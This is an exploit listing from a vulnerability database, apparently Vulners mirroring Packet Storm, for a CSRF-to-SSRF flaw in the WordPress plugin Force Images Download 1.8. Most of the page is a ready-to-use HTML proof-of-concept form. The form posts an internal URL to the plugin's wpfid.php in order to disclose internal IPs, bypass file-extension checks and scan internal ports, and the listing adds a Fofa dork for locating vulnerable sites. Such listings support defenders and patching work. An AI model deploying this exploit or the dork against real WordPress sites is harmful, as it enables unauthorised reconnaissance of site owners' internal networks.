Lucene search
K

WordPress Force Images Download 1.8 CSRF / SSRF

🗓️ 17 Jul 2023 00:00:00Reported by EtharusType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 241 Views

WordPress Force Images Download 1.8 CSRF / SSRF vulnerability for internal IP disclosure, file extension bypass, and internal port scan

Code
`# Exploit Author : Etharus  
# Vulnerability : Cross Site Request Forgery to Server Side Request Forgery  
# Impact : internal ip disclosure , file extension bypass, internal port scan.  
# Product Vendor : Nazakat Ali  
# Version Tested : 1.8  
# Date : 14/07/2023  
# Fofa Dork : "/wp-content/plugins/wp-force-images-download/"  
  
<form id="wpfid-form" method="post" action="https://target/wp-content/plugins/wp-force-images-download/wpfid.php">  
<input name="wpfid_pic_url" type="text" placeholder="[TARGET URL] : http://127.0.0.1/?r=bypass.jpg">  
<br><input name="new_name" type="hidden" value="">  
<button style="background: gray; --darkreader-inline-bgcolor: #60686c; --darkreader-inline-bgimage: none;" class="d-btn" id="wpfid_button" type="submit" title="Download" data-darkreader-inline-bgcolor="" data-darkreader-inline-bgimage="">  
<span style="line-height: 30px;" class="wpfid_title">Download</span>  
</button>  
</form>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation